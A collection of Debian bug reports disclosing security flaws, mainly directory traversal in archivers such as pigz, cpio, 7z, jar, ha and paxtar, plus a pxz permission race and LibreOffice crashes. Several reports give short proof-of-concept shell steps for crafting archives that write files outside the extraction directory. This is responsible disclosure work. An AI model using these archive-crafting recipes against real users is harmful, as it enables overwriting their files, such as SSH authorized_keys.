Bug#884881: apt-cacher-ng: Remap-... directives without TargetURLs are incompatible with ForceManaged
Package: apt-cacher-ng Version: 2-1~bpo8+1 Tags: security It seems the conf line 'Remap-secdeb: security.debian.org' doesn't work with 'ForceManaged: 1'. It works without ForceManaged -- files are put in cache under secdeb. And it works with ForceManaged if you add 'security.debian.org' once more time as TargetURLs. Here is a test illustrating the problem: -- # apt-get purge apt-cacher-ng -y && rm -r /etc/apt-cacher-ng/ && apt-get install apt-cacher-ng [skip] # echo 'Remap-secdeb: security.debian.org' > /etc/apt-cacher-ng/my.conf # service apt-cacher-ng restart # curl -I -x http://127.0.0.1:3142/ http://security.debian.org/dists/jessie/updates/InRelease HTTP/1.1 200 OK Content-Length: 63113 Last-Modified: Wed, 20 Dec 2017 21:47:45 GMT Content-Type: application/octet-stream Date: Wed Dec 20 21:55:39 2017 Server: Debian Apt-Cacher NG/0.8.0 X-Original-Source: http://security.debian.org/dists/jessie/updates/InRelease Connection: Keep-Alive # ls /var/cache/apt-cacher-ng/ secdeb # echo 'ForceManaged: 1' >> /etc/apt-cacher-ng/my.conf # service apt-cacher-ng restart # curl -I -x http://127.0.0.1:3142/ http://security.debian.org/dists/jessie/updates/InRelease HTTP/1.1 403 Forbidden file type or location: http://security.debian.org/dists/jessie/updates/InRelease Content-Length: 186 Content-Type: text/html Date: Wed Dec 20 21:55:39 2017 Server: Debian Apt-Cacher NG/0.8.0 Connection: Keep-Alive # echo 'Remap-secdeb: security.debian.org ; security.debian.org' > /etc/apt-cacher-ng/my.conf # echo 'ForceManaged: 1' >> /etc/apt-cacher-ng/my.conf # service apt-cacher-ng restart # curl -I -x http://127.0.0.1:3142/ http://security.debian.org/dists/jessie/updates/InRelease HTTP/1.1 200 OK Content-Length: 63113 Last-Modified: Wed, 20 Dec 2017 21:47:45 GMT Content-Type: application/octet-stream Date: Wed Dec 20 21:55:39 2017 Server: Debian Apt-Cacher NG/0.8.0 X-Original-Source: http://security.debian.org/dists/jessie/updates/InRelease Connection: Keep-Alive -- Tested with apt-cacher-ng from jessie (0.8.0-3) and from jessie-backports (2-1~bpo8+1). AIUI it should work without TargetURLs. The doc at [1] seems to imply it: "If the ForceManaged option is set, only requests to URL matched in some Remap-... config is allowed." [1] https://www.unix-ag.uni-kl.de/~bloch/acng/html/config-serv.html#remap-trickz And a comment in /etc/apt-cacher-ng/acng.conf for Remap-secdeb without TargetURLs directly talks about ForceManaged use case: # This is usually not needed for security.debian.org because it's always the # same DNS hostname. However, it might be enabled in order to use hooks # or ForceManaged mode or special flags in this context. Not set by default. # Remap-secdeb: security.debian.org I've put the 'security' tag on this bug as a straightforward and documented config will cause clients to miss security updates. A simple test from an admin of this setup would reveal the problem so the danger doesn't seem great:-) -- Alexander Cherepanov
Bug#775306: pxz: race condition in setting permissions on output file
Package: pxz Version: 4.999.99~beta3+git659fc9b-2 Tags: security pxz sets the mode of an output file to be the same as the one of an input file but does it only after compression is over. This leaves the output file with the wrong mode during all the time of the compression process. Illustration: $ truncate -s 1G foo $ chmod 600 foo $ pxz foo [1] 9240 $ ls -l foo.xz -rw-r--r-- 1 user user 0 Jan 14 00:33 foo.xz $ wait % [1]+ Donepxz foo $ ls -l foo.xz -rw--- 1 user user 161976 Jan 14 00:33 foo.xz The issue is similar to https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0296 . -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#775218: ppmd: directory traversal vulnerability
Package: ppmd Version: 10.1-5 Tags: security ppmd is susceptible to directory traversal vulnerabilities. While decompressing a file, it will happily use absolute and relative paths taken from the input. This can be exploited by a malicious compressed file to write files outside the current directory. 1. Absolute path. A sample could be prepared in the following way: $ touch XtmpXabs $ ppmd e -ftest.pmd XtmpXabs $ sed -i 's|XtmpXabs|/tmp/abs|g' test.pmd $ rm XtmpXabs Then check it works: $ ls /tmp/abs ls: cannot access /tmp/abs: No such file or directory $ ppmd d test.pmd Fast PPMII compressor for textual data, variant J, Apr 19 2012 /tmp/abs: 5 1, 40.00 bpb, used: 0.0MB, speed: 1 KB/sec $ ls /tmp/abs /tmp/abs 2. Relative path with ... A sample could be prepared in the following way: $ touch XXXrel $ ppmd e -ftest.pmd XXXrel $ sed -i 's|XXXrel|../rel|g' test.pmd $ rm XXXrel Then check it works: $ ls ../rel ls: cannot access ../rel: No such file or directory $ ppmd d test.pmd Fast PPMII compressor for textual data, variant J, Apr 19 2012 ../rel: 5 1, 40.00 bpb, used: 0.0MB, speed: 1 KB/sec $ ls ../rel ../rel -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#774978: pigz: directory traversal vulnerability
Package: pigz Version: 2.3.1-1 Tags: security pigz is susceptible to directory traversal vulnerabilities. While decompressing a file with restoring file name, it (unlike gzip) will happily use absolute and relative paths taken from the input. This can be exploited by a malicious archive to write files outside the current directory. 1. Absolute path. A sample could be prepared in following way: $ touch XtmpXabs $ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' abs.gz $ rm XtmpXabs Then check it works: $ ls /tmp/abs ls: cannot access /tmp/abs: No such file or directory $ unpigz -N abs.gz $ ls /tmp/abs /tmp/abs 2. Relative path with ... A sample could be prepared in following way: $ rm ../rel $ touch XXXrel $ gzip -c XXXrel | sed 's|XXXrel|../rel|g' rel.gz $ rm XXXrel Then check it works: $ ls ../rel ls: cannot access ../rel: No such file or directory $ unpigz -N rel.gz $ ls ../rel ../rel -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#774989: kgb: directory traversal vulnerability
Package: kgb Version: 1.0b4+ds-13.2 Tags: security kgb is susceptible to a directory traversal vulnerability. While extracting an archive, it will happily use absolute paths taken from the archive. This can be exploited by a malicious archive to write files outside the current directory. A sample archive could be prepared in the following way: $ touch /tmp/abs $ kgb -0 test.kgb /tmp/abs $ rm /tmp/abs Then check it works: $ ls /tmp/abs ls: cannot access /tmp/abs: No such file or directory $ kgb test.kgb Extracting archive KGB_arch -0 test.kgb ... 0KB /tmp/abs: extracted 0KB - 0KB w 0.00s. $ ls /tmp/abs /tmp/abs Notes: - kgb already rejects paths with .. ; - kgb doesn't handle symlinks at all. -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#774953: jar(1): directory traversal
Package: openjdk-7-jdk Version: 7u71-2.5.3-2 Tags: security jar(1) is susceptible to a directory traversal vulnerability. While extracting an archive, it will happily use absolute and relative paths taken from the archive. This can be exploited by a malicious archive to write files outside the current directory. For example, let's create a sample archive: $ mkdir Xtmp/ XX/ $ touch Xtmp/abs XX/rel $ jar -cMvf test.jar Xtmp/abs XX/rel $ sed -i 's|Xtmp/|/tmp/|g;s|XX/|../|g' test.jar $ rm -r Xtmp/ XX/ and then test it: $ ls /tmp/abs ../rel ls: cannot access /tmp/abs: No such file or directory ls: cannot access ../rel: No such file or directory $ jar -xvf test.jar extracted: /tmp/abs extracted: ../rel $ ls /tmp/abs ../rel ../rel /tmp/abs My `jar` points to /etc/alternatives/jar, which points to /usr/lib/jvm/java-7-openjdk-amd64/bin/jar . Not sure if this is just CVE-2005-1080 not fixed or something else. But please note that CVE-2005-1080 talks about .. only. -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#774954: ha: directory traversal vulnerabilities
Package: ha Version: 0.999p+dfsg-5 Tags: security ha is susceptible to directory traversal vulnerabilities. While extracting an archive, it will happily use absolute and relative paths taken from the archive. This can be exploited by a malicious archive to write files outside the current directory. ha seems to store file names separately from their paths. Directory traversals are possible through both of the parts. 1. Through file name part. A sample archive could be prepared in following way: $ touch XtmpXabs XXXrel $ ha a test.ha XtmpXabs XXXrel $ sed -i 's|XtmpXabs|/tmp/abs|g;s|XXXrel|../rel|g' test.ha $ rm XtmpXabs XXXrel Then check it works: $ ls /tmp/abs ../rel ls: cannot access /tmp/abs: No such file or directory ls: cannot access ../rel: No such file or directory $ ha lf test.ha HA 0.999� Copyright (c) 1995 Harri Hirvola Archive : test.ha (2 files) filenameoriginalcompressed rate datetime m CRC-32path attr === /tmp/abs0 0 100.0 % 2015-01-09 15:24 CPY (none) -rw-r--r-- --- ../rel 0 0 100.0 % 2015-01-09 15:24 CPY (none) -rw-r--r-- === 2 0 0 100.0 % $ ha x test.ha HA 0.999� Copyright (c) 1995 Harri Hirvola Archive : test.ha (2 files) Unpacking CPY 100 % /tmp/abs Unpacking CPY 100 % ../rel $ ls /tmp/abs ../rel ../rel /tmp/abs 2. Through path part. A sample archive could be prepared in following way: $ mkdir Xtmp/ XX/ $ touch Xtmp/abs XX/rel $ ha a test.ha Xtmp/abs XX/rel $ sed -i 's|Xtmp|/tmp|g;s|XX|..|g' test.ha $ rm -r Xtmp/ XX/ Then check it works: $ ls /tmp/abs ../rel ls: cannot access /tmp/abs: No such file or directory ls: cannot access ../rel: No such file or directory $ ha lf test.ha HA 0.999� Copyright (c) 1995 Harri Hirvola Archive : test.ha (2 files) filenameoriginalcompressed rate datetime m CRC-32path attr === abs 0 0 100.0 % 2015-01-09 15:29 CPY /tmp/ -rw-r--r-- --- rel 0 0 100.0 % 2015-01-09 15:29 CPY ../ -rw-r--r-- === 2 0 0 100.0 % $ ha x test.ha HA 0.999� Copyright (c) 1995 Harri Hirvola Archive : test.ha (2 files) Unpacking CPY 100 % /tmp/abs Unpacking CPY 100 % ../rel $ ls /tmp/abs ../rel ../rel /tmp/abs -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#774669: cpio: directory traversal vulnerability via symlinks
Hi! --no-absolute-filenames option seems to be intended to limit extracting contents of an archive to be strictly inside a current directory (it guards against both absolute paths and relative paths with .. in them). However it can be bypassed with symlinks. While extracting an archive, it will extract symlinks and then follow them if they are referenced in further entries. This can be exploited by a rogue archive to write files outside the current directory. For example, let's create a sample archive: ln -s /tmp dir touch /tmp/file echo 'dir dir/file' | cpio -ov test.cpio rm dir /tmp/file and then test it: cpio --no-absolute-filenames -iv test.cpio This will create a symlink dir in the current directory and a file /tmp/file by following this symlink. BTW why --no-absolute-filenames is not default? In contrast with tar which is secure by default. -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#774669: Directory traversal through symlinks
Hi Vasyl, On Wed, 7 Jan 2015 15:43:54 +0100 Vasyl Kaigorodov vkaig...@redhat.com wrote: My quick test shows that with the proper filesystem permissions no harm could be done: $ pwd /home/vk/cpio $ ls -lad /home/postgres/ drwx-- 4 postgres postgres 4096 May 21 2014 /home/postgres/ $ ln -s /home/postgres/.mozilla dir ... $ cpio --no-absolute-filenames -ivF test.cpio dir cpio: dir/file: Cannot open: Permission denied dir/file 1 block The problem is not that you can bypass filesystem permissions with cpio. cpio is not setuid or special in any other way. Hence filesystem permissions protect from it just fine. The problem is with unpacking untrusted archives (downloaded from the Web, received by email etc.). If unpacker doesn't protect from directory traversals extracting contents of a malicious archive could lead to overwriting sensitive files such as /home/vkaigoro/.ssh/authorized_keys, i.e. your own files, strictly within filesystem permissions. Do you think this is a valid case for a CVE? Yes. -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#774716: paxtar: directory traversal vulnerabilities
Package: pax Version: 1:20140703-2 Tags: security paxtar is susceptible to directory traversal vulnerabilities. They can be exploited by a rogue archive to write files outside the current directory. 1. paxtar will extract files with .. components in names. For example, let's create a sample archive: echo hello ../file paxtar cvf test.tar ../file rm ../file and then test it: paxtar xvf test.tar This will create a file ../file. 2. While extracting an archive, it will extract symlinks and then follow them if they are referenced in further entries. For example, let's create a sample archive: ln -s /tmp dir paxtar cvf test.tar dir rm dir mkdir dir echo hello dir/file paxtar rvf test.tar dir/file rm -r dir and then test it: paxtar xvf test.tar This will create a symlink dir in the current directory and a file /tmp/file. -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#774669: Directory traversal through symlinks
Package: cpio Version: 2.11+dfsg-0.1+deb7u1 Tags: security cpio is susceptible to a directory traversal vulnerability. While extracting an archive, it will extract symlinks and then follow them if they are referenced in further entries. This can be exploited by a rogue archive to write files outside the current directory. Example: 1) create a sample archive: ln -s /tmp dir echo dir | cpio -oF test.cpio rm dir mkdir dir echo hello dir/file echo dir/file | cpio -oAF test.cpio rm -r dir 2) test it: cpio --no-absolute-filenames -ivF test.cpio This will create a symlink dir in the current directory and a file /tmp/file. -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#774660: Directory traversal through symlinks
Package: p7zip-full Version: 9.20.1~dfsg.1-4 Tags: security 7z (and 7zr) is susceptible to a directory traversal vulnerability. While extracting an archive, it will extract symlinks and then follow them if they are referenced in further entries. This can be exploited by a rogue archive to write files outside the current directory. Example: 1) create a sample archive: ln -s /tmp dir 7z a test.7z dir rm dir mkdir dir echo hello dir/file 7z a test.7z dir/file rm -r dir 2) test it: 7z x test.7z This will create a symlink dir in the current directory and a file /tmp/file. This can also be exploited through zip, arj and maybe other archives. -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#774211: freeze exception for binutils 2.25-3
On 2014-12-30 14:05, Matthias Klose wrote: - several fixes for CVE issues, the security team asked to include these into jessie. - CVE-2014-8484 (PR binutils/17509). - CVE-2014-8485, CVE-2014-8504 (PR binutils/17510). - CVE-2014-8501, CVE-2014-8502, CVE-2014-8503 (PR binutils/17512). Please note that PR binutils/17512 includes much more issues/fixes than those CVEs. And there is also PR binutils/17531 ... -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#770166: Several crashes opening malformed files
Hi, On 2014-11-19 15:11, Rene Engelhard wrote: On Wed, Nov 19, 2014 at 01:26:54PM +0300, Alexander Cherepanov wrote: Package: libreoffice Version: 1:3.5.4+dfsg2-0+deb7u2 Please note that there are several crashes in the version of LibreOffice shipped with Debian wheezy. Issues are reported upstream, the list is here: http://www.openwall.com/lists/oss-security/2014/11/19/3 Aha. Hangs and crashes only Not sure what you mean. If you talk about master -- maybe. But for 3.5.4 https://bugs.freedesktop.org/show_bug.cgi?id=86449 (and the list linked above) clearly says potentially exploitable. Do you disagree with this assessment and need an actual exploit? - and then oss-security? Why not? At least it could serve as additional data for an ongoing discussion there about fuzzing and software quality. FWIW, I agree with Michael here. If you would care about those issues for everyone this simply would mean that for all reverse-engineered/proprietary formats every bug in this case would be a security Yes, that would be a security issue. What is surprising about it? Should it be any different from, e.g., browsers? update with all the brimborium and DSA etc. No, that's not sensible, I think. How to deal with it is entirely different question. One can think about various possible solutions -- from adding Known bugs section to the man page stating Opening a file in LO that you get by email can cause you to loose the work you are doing in another LO window or your computer to be pwned. to disabling some input filters by default (and caring about other filters). Unless someone proves this has real impact _and has patches_ As of now, some of the mentioned issues are already fixed upstream. Not sure how easy it would be to backport fixes though. I am not going to care. This is in a dead-upstream version anyway. If there are nobody who cares enough about LO to join you supporting it in Stable perhaps it should be EOLed similar to Iceweasel? And now seems to be good time to think about it for the next release cycle. -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#770166: Several crashes opening malformed files
Package: libreoffice Version: 1:3.5.4+dfsg2-0+deb7u2 Please note that there are several crashes in the version of LibreOffice shipped with Debian wheezy. Issues are reported upstream, the list is here: http://www.openwall.com/lists/oss-security/2014/11/19/3 -- Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org